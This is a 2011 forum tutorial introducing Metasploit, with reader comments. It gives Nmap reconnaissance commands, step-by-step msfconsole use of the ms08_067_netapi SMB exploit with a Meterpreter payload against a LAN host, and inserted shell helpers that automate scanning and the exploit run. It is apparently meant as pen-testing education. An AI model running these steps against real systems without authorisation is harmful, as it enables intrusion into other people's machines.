An Introduction To The Metasploit Framework [Published]

edited July 2011 in Tech & Games
What is the Metasploit Framework?
The Metasploit Framework is an incredible tool for pen-testers and hackers. Used globally by even the most professional of penetration testers, Metasploit presents the user with a large number of exploits, payloads and auxiliary modules which can all be used to test anything from the common household machine to complex servers in an office block. Whatever your reason is for using the Metasploit framework, you should rest assured that it will be one of the best tools in your arsenal.

Starting up Metasploit
Now, without further ado, let's get down to business. I usually start by firing up Metasploit in a terminal, using the msfconsole interface. Metasploit has a few different interfaces, including a graphical one. They all have their purposes, but I much prefer msfconsole because it's entirely command-line driven and very powerful. To start msfconsole, open up your terminal and type;
msfconsole

Hit enter and let it do its thing. If you've just updated, or it's your first time running the tool, it might take a little while to start up.

Updating the Metasploit Framework
Before we get started, you'll probably need to update a few things. Run the command "msfupdate". Each update brings new exploits, various patches, improvements and new payloads: basically everything you can think of. It's a very well maintained piece of kit! I usually update the whole system before doing anything major anyway, just in case there's been a significant update to one of my packages. Once you start updating, it will look something like this...

[screenshot: msfupdate output]

Building Information on the Target using Nmap
Before we run in all-guns-blazing and cause a big mess, we need to build up some information on our target. The basic things which we will need to determine are as follows;

Target's IP address (this will be internal for the sake of this guide)
Which ports are open
Which service is running on each port
The operating system of the target machine

As you go deeper into the world of pen-testing, you may find that you need more information on the subject. In fact, I recommend that you find out as much as you possibly can before starting a pen-test, using various information gathering techniques. I won't go into detail here but I might write something on it in another article.

Open up a new terminal. We're going to use Nmap to find the IP address of the target machine on the network by running a ping scan. This doesn't port-scan anything; it only does host discovery (by default an ICMP echo plus TCP probes to ports 80 and 443) to see which machines answer. Newer versions of Nmap call this -sn; -sP still works as an alias.
nmap -sP 192.168.0.1/24

Running this command should list the IP addresses of the live machines on your network. Obviously you'll need to change the address range if your network is different from mine (192.168.0.1/24 covers 192.168.0.0 to 192.168.0.255).

[screenshot: nmap ping-scan results]

So, I've picked the machine I want to attack. In my case, it's the Intel machine with the internal IP address 192.168.0.6. Now, let's get some more in-depth information about this particular machine by running a port scan on it. I'm not going to bother with any real stealth on this scan, seeing as it's on my own network and I'm not trying to avoid detection. Therefore, I'll only be using the -sS, -vv and -A flags: -sS is a TCP SYN scan (it needs root), -A turns on OS detection, version detection, default NSE scripts and traceroute, and -vv makes the output very verbose. For a full list of nmap flags, check out the Nmap website. Run the command;
nmap -sS -A -vv 192.168.0.6

This kicks out a shit load of information onto my screen (thanks to the -vv flag). The main things I'm looking at are the open ports on the machine, and what the version detection says is running behind each one.

PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp open  http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)

Port 445 (microsoft-ds, which is SMB on this Windows XP box) is the one I'm going to try and exploit using the Metasploit Framework. Bear in mind that these version strings come from banners and fingerprints, so treat them as a strong hint rather than gospel. Unfortunately, I'm not going to do all the hard work for you. You need to get your Google hat on and start searching around for exploits for the services which came up in your nmap scan! Once you've found one, you might find that it's already part of the Metasploit Framework and you can look for it using the "search" command.
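The two scans above, wrapped into something reusable. This is an added example, not part of the original guide: a few POSIX shell helpers that run Nmap in greppable output mode (-oG) and pull out only the open ports, so you don't have to eyeball the -vv output to find them. The greppable lines it parses are constructed to mirror the results shown above (plus one filtered port to show it is skipped); they are not captured Nmap output. sweep and scan_host assume nmap is installed and that you are root, which -sS requires.

```shell
#!/bin/sh
# Added example: helpers around nmap's greppable (-oG) output.
# The sample data below is CONSTRUCTED to mirror the guide's results; it is not real output.

# sweep RANGE: host discovery only (the guide's -sP; -sn is the current spelling), one IP per line.
sweep() {
    nmap -sn -oG - "$1" | awk '/Status: Up/ { print $2 }'
}

# scan_host IP: SYN scan plus version detection, filtered down to open ports. -sS needs root.
scan_host() {
    nmap -sS -sV -oG - "$1" | open_ports
}

# open_ports: read -oG output on stdin and print "host port/proto service version"
# for every port whose state is "open". A greppable port entry looks like
#   445/open/tcp//microsoft-ds//Microsoft Windows XP microsoft-ds/
# i.e. port/state/proto/owner/service/rpcinfo/version/, and entries are joined by ", ".
# The Host, Ports and Ignored State fields are tab-separated.
open_ports() {
    awk -F'\t' '
        /\tPorts: / {
            host = $1
            sub(/^Host: /, "", host)
            sub(/ .*$/, "", host)
            for (i = 2; i <= NF; i++)
                if ($i ~ /^Ports: /) ports = substr($i, 8)
            n = split(ports, entry, ", ")
            for (j = 1; j <= n; j++) {
                split(entry[j], f, "/")
                if (f[2] == "open")
                    printf "%s %s/%s %s %s\n", host, f[1], f[3], f[5], f[7]
            }
        }'
}

# smb_open: exit 0 if the parsed output on stdin shows 445/tcp open (the service the guide goes after).
smb_open() {
    grep -q ' 445/tcp '
}

# sample_grepable: constructed stand-in for "nmap -sS -sV -oG - 192.168.0.6".
sample_grepable() {
    printf 'Host: 192.168.0.6 ()\tStatus: Up\n'
    printf 'Host: 192.168.0.6 ()\tPorts: 135/open/tcp//msrpc//Microsoft Windows RPC/, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds//Microsoft Windows XP microsoft-ds/, 2869/open/tcp//http//Microsoft HTTPAPI httpd 1.0 (SSDP|UPnP)/, 3389/filtered/tcp//ms-wbt-server///\tIgnored State: closed (995)\n'
}

# Demo on the constructed sample (no network or root needed). Live use: sweep 192.168.0.1/24; scan_host 192.168.0.6
sample_grepable | open_ports
```

The -oG format is stable and easy to post-process, which is why the parser keys off it rather than the human-readable table; `nmap -oG -` writes it to stdout. If you want the OS fingerprint as well, add -O to scan_host's flags (it also needs root).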

How to use Metasploit to Exploit a Computer
Please note that I'm using old screenshots in this section because my laptop died. Everything is exactly the same, including the port/service and IP address used! Just don't mind the old-school BackTrack design.

So, we've got our IP address, our open ports, the services running on each port, and we've determined which service we're going to exploit. Now we can get down to the fun part - exploiting and gaining access to the machine! Switch back to your msfconsole window and you should find that everything is loaded and ready to go. We're going to do things in the following order;

1. Search for and use an exploit
2. Set the payload
3. Set options
4. Run the exploit

1. To search for an exploit, type "search" followed by the keyword you want to look for. For example, I'm looking for the ms08_067_netapi exploit, so I type the following into the console;
search ms08_067

If you want to display every single exploit in the Metasploit Framework instead, type "show exploits" into the console. Once you have found your exploit, you need to "use" it so that Metasploit knows it's the one you want ("info" will then show you its description, targets and options). To do this, type the following, replacing my exploit with your chosen one;
use exploit/windows/smb/ms08_067_netapi

[screenshot: searching for and using ms08_067_netapi]

2. Next, you need to set the payload. A payload is the code that runs on the target once the exploit has succeeded, and it can do many different things. For example, you may want a plain command shell on the victim, in which case you'd choose one of the shell payloads. In this example, however, I'll be using a Meterpreter payload. Meterpreter is a very fun tool and I think you'll enjoy it the most out of them all.

To show all the payloads available, simply type in the following;
show payloads

Or you can search for a specific one, restricting the search to payloads, by typing;
search type:payload meterpreter

[screenshot: payload search results]

To set your payload, type the following into the console, replacing my payload with one of your choice. Note that bind_tcp makes the target listen on a port (LPORT, 4444 by default) and has Metasploit connect to it, so a host firewall on the target will block it; the reverse_tcp variant connects back to you instead and needs LHOST set to your own address;
set PAYLOAD windows/meterpreter/bind_tcp

3. Once your payload is set, we need to quickly set a few options up. Type the following into your console to get the options up;
show options

In my case, all I need to do is set RHOST, the IP address of the target machine (192.168.0.6). RPORT is already 445, the SMB port this exploit talks to, so nothing else needs changing. Run "show options" again afterwards to check that every required option is filled in.

[screenshot: show options output]

4. Finally, we're ready to run the exploit! It's as simple as typing...
exploit

Now, you'll see the exploit getting to work!

[screenshot: the exploit running and a Meterpreter session opening]

I've popped open a Meterpreter session, as you can see in the screenshot. This lets me do a shit load of stuff, which you can read about in the Metasploit Unleashed guide. For the purpose of this guide, I migrated Meterpreter into a different, longer-lived process with the migrate command (so the session survives if the exploited service falls over) and then popped open a shell on the other computer. This shows the power of the Metasploit Framework and Meterpreter!
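Steps 1 to 4 above are exactly what msfconsole's resource scripts (the -r option) exist for, so you don't retype them on every run. The following is an added example and not from the original guide: a small POSIX shell helper that writes the resource script for a given exploit, payload and target, and refuses to emit a reverse payload without an LHOST, which is the mistake a bind_tcp walkthrough makes easy once you swap payloads. It assumes the target option is called RHOST, as in the 2011-era module shown in the screenshots (newer Metasploit versions use RHOSTS, so check "show options"), and run_rc assumes msfconsole is on your PATH.

```shell
#!/bin/sh
# Added example: generate and replay an msfconsole resource script for the guide's four steps.
# Assumptions: the exploit's target option is RHOST (newer Metasploit uses RHOSTS; check
# "show options") and msfconsole is on PATH for run_rc.

# build_rc EXPLOIT PAYLOAD RHOST [LHOST]
# Prints the resource script on stdout. Returns 1 and prints nothing if a reverse
# payload is requested without an LHOST, since that session could never connect back.
build_rc() {
    exploit=$1
    payload=$2
    rhost=$3
    lhost=${4:-}

    case $payload in
        */reverse_*)
            if [ -z "$lhost" ]; then
                echo "build_rc: $payload connects back to you; pass LHOST as the fourth argument" >&2
                return 1
            fi
            ;;
        */bind_*)
            # bind payloads listen on the target (LPORT, 4444 by default) and need no LHOST,
            # but a host firewall on the target will block them; reverse_tcp is the usual fallback.
            ;;
    esac

    printf 'use %s\n' "$exploit"
    printf 'set PAYLOAD %s\n' "$payload"
    printf 'set RHOST %s\n' "$rhost"
    if [ -n "$lhost" ]; then
        printf 'set LHOST %s\n' "$lhost"
    fi
    # -j runs the exploit as a background job and -z leaves any new session open without
    # attaching to it, so the script can go on to list the sessions it got.
    printf 'exploit -j -z\n'
    printf 'sessions -l\n'
}

# run_rc FILE: start msfconsole quietly (-q, no banner) and replay the script (-r).
run_rc() {
    msfconsole -q -r "$1"
}

# The guide's own case: ms08_067_netapi with a bind Meterpreter against 192.168.0.6.
# Redirect into a file (e.g. > ms08_067.rc) and hand that to run_rc on a box with Metasploit.
build_rc exploit/windows/smb/ms08_067_netapi windows/meterpreter/bind_tcp 192.168.0.6
```

Once the script has run you attach to the session yourself with "sessions -i 1" (or whichever number "sessions -l" printed). Keep the generated .rc files out of any shared repository: they spell out targets and, for reverse payloads, your own listener address.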

So, what next?
This guide was designed to push you in the right direction, as I really wanted something like this to read when I was first learning about MSF. Next, you should read about maintaining access to the computer with a backdoor, and other post-exploitation topics. I thoroughly recommend reading up on a few things, so check out these links for more information.

Metasploit Unleashed
Nmap Reference Guide

Comments

  • Darth Beaver Meine Ehre heißt Treue
    edited July 2011
    This is an amazing guide TRX. I am responding to it so I have it in my subscription list. Tell me can this all be done on a Windoze platform?
  • buddha Regular
    edited July 2011
    Well now I don't have any reason for not using it now, I installed a bunch of BT tools months ago.
  • edited July 2011
    If you REALLY wanted to do this in a Windows platform then you'd have to run Backtrack in a VM or something. To be honest, it's probably more hassle than it's worth, and booting into Backtrack doesn't take that much effort. You can use a Live CD to run backtrack if you want, so you don't even have to install it to your hard disk.

    And yeah Buddha, that's a good reason to get started with it! This isn't the best guide in the world but I thought it would push you in the right direction. You need to read through that Metasploit Unleashed Wiki that I linked to - it's probably THE best guide on Metasploit out there.
  • Darth Beaver Meine Ehre heißt Treue
    edited July 2011
    OK so I could do this in an environment similar to knoppix?
  • thewanderer Regular
    edited July 2011
    Taken from: Network (in)Security
  • Slartibartfast Global Moderator -__-
    edited July 2011
    TDR, if you were to download backtrack it has this preinstalled (along with a bunch of other crazy stuff).

    It's a live-CD (like knoppix) it's roughly 1.5GB though...
  • edited July 2011
    Taken from: Network (in)Security

    Pretty sure I already added this to the CMS straight after I wrote it, but I can't remember. I definitely forgot to put the [Published] bit on the end though, lol.
  • thewanderer Regular
    edited July 2011
    I can't find it anywhere if you did. :confused: I'm in the process of adding it now.